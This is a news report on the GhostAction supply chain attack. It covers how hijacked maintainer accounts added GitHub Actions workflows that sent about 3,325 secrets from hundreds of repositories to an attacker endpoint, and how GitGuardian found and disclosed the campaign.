A new supply chain attack targeting GitHub workflows, dubbed GhostAction, has compromised about 3,325 secrets across multiple ecosystems, including PyPI, npm, DockerHub, GitHub tokens, Cloudflare and AWS keys, researchers say.
The attack was uncovered by GitGuardian researchers, who noted that the first signs of compromise on the FastUUID project appeared on 2 September 2025 after attackers gained control of maintainer accounts and inserted malicious GitHub Actions workflows that run on push or manual dispatch. The researchers describe the incident in detail in their analysis, which is published by GitGuardian.
The malicious workflows exfiltrate secrets from the project’s GitHub Actions environment to an external endpoint controlled by the attacker via a curl POST request, according to GitGuardian’s analysis.
In the FastUUID case, the attackers stole the project’s PyPI token, though GitGuardian said no malicious packages were released on PyPI before detection and remediation.
Initial tracing showed the GhostAction operation was broader than a single repository. The researchers say the campaign injected similar commits into at least 817 repositories, all directing secrets to the same exfiltration endpoint hosted at an external domain. The attackers enumerated secret names from legitimate workflows and hardcoded them into their own workflows to harvest multiple secret types.
When the full scope was revealed on 5 September, GitGuardian opened issues in 573 affected repositories and notified the security teams at GitHub, npm and PyPI. By that point, around 100 GitHub repositories had already detected the compromise and rolled back the malicious changes.
Exfiltration activity ceased not long after the discovery, with the endpoint reportedly stopping to resolve shortly thereafter. GitGuardian estimates the GhostAction campaign stole roughly 3,325 secrets, including PyPI and npm tokens, DockerHub tokens, GitHub tokens, Cloudflare API tokens, AWS access keys and database credentials.
Researchers warned that at least nine npm packages and 15 PyPI packages are directly affected and could see malicious or trojanized versions released until their maintainers revoke leaked credentials. “This analysis reveals compromised tokens across multiple package ecosystems, including Rust crates and npm packages,” GitGuardian said in a post summarising the findings.
The company noted that while some practical and technical similarities exist with a prior campaign, GitGuardian does not believe there is a confirmed connection to the earlier s1ngularity operation.